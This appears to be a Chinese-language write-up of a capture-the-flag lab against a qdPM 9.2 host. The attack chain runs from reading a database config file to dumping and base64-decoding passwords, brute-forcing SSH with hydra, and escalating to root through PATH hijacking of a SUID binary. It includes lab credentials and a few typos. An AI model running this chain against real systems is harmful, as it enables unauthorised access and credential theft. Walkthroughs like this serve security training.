我们还是使用 kali 中的 arp-scan -l 查询靶机 ip
靶机 ip:192.168.75.129
第一步 信息收集
nmap -sS 192.168.75.129
访问网站
这个是一个web应用,框架是qdpm 9.2
在kali上搜索一下发现有两个漏洞,依次看一下
searchsploit qdpm 9.2
1.locate 50854.txt
cat /usr/share/exploitdb/exploits/php/webapps/50854.txt
这个是一个csrf的html文件
2.50176.txt
数据库的密码和连接字符串存储在yml文件中。
访问地址:/core/config/databases.ym
第二步 漏洞利用
访问地址后下载下来一个文件
进行连接数据库,用户名qdpmadmin;密码:UcVQCMQk2STVeS6J
我们去连接数据库
mysql -u qdpmadmin -h 192.168.47.135 -p
在staff这个数据库有三张表
#user表中都是用户名
Smith
ucas
Travis
Dexter
Meyer
#login表中都是base64加密
c3VSSkFkR3dMcDhkeTNyRg==
N1p3VjRxdGc0MmNtVVhHWA==
WDdNUWtQM1cyOWZld0hkQw==
REpjZVZ5OThXMjhZN3dMZw==
Y3FObkJXQ0J5UzJEdUpTeQ==
#解密
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy
爆破一下靶机的ssh
user和passwd做成一个文件
hydra -L user -P passwd ssh://192.168.47.135
在这里用户名首字母都是大写;我们要给他换成小写;要不会爆不出来
使用ssh去连接;获取flag
第三步 提权
切换用户dexter
查看了一下note.txt
文件给了提示需要suid提权
#查找具有SetUID权限的文件的命令
find / -perm -4000 2>/dev/null
使用strings命令查看一下get_access
发现cat命令提权
配置环境变量
echo "/bin/bash" > /tmp/cat
export PATH=/tmp:$PATH
chmod +x /tmp/cat
ehco $PATH
/opt/get_access
